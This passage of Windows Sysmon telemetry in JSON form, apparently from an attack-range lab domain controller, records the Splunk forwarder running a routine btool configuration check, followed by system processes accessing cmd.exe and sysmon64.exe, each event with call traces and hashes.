{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2006,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.561\r\nProcessGuid: {A837DB8D-01C9-5F25-0000-0010EEE40300}\r\nProcessId: 3836\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-01C7-5F25-0000-001075BD0300}\r\nParentProcessId: 3736\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.561","ProcessGuid":"{A837DB8D-01C9-5F25-0000-0010EEE40300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-01C7-5F25-0000-001075BD0300}","ParentProcessId":"3736","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2007,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.547\r\nSourceProcessGUID: {A837DB8D-01C7-5F25-0000-001075BD0300}\r\nSourceProcessId: 3736\r\nSourceThreadId: 3716\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {A837DB8D-01C9-5F25-0000-0010EEE40300}\r\nTargetProcessId: 3836\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.547","SourceProcessGUID":"{A837DB8D-01C7-5F25-0000-001075BD0300}","SourceProcessId":"3736","SourceThreadId":"3716","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{A837DB8D-01C9-5F25-0000-0010EEE40300}","TargetProcessId":"3836","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2008,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.547\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C9-5F25-0000-0010EEE40300}\r\nTargetProcessId: 3836\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.547","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C9-5F25-0000-0010EEE40300}","TargetProcessId":"3836","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2009,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.547\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.547","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2010,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.547\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.547","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2011,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.547\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.547","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2012,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.547\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.547","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2013,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.547\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.547","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2014,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.547\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 